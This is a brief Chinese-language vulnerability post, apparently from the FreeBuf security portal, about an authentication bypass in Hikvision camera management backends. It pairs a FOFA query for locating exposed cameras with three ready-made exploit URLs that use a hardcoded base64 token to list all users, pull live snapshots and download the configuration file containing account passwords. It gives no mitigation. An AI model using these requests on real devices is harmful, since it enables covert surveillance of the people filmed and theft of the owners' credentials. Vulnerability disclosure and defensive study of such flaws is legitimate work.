官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
一、漏洞概述:
杭州海康威视系统技术有限公司摄像头管理后台存在未授权,通过构造url可绕过登录查看监控,检索所有用户和配置文件下载。
fofa搜索:app="HIKVISION-视频监控"
二、漏洞利用:
1、利用路径:
http://your-ip/Security/users?auth=YWRtaW46MTEK
YWRtaW46MTEKadmin:11的base64编码
检索所有用户及其角色的列表。
2、利用路径:
http://your-ip/onvif-http/snapshot?auth=YWRtaW46MTEK
获取监控快照,不进行身份验证。
3、利用路径:
http://your-ip/System/configurationFile?auth=YWRtaW46MTEK
下载摄像头配置账号密码文件。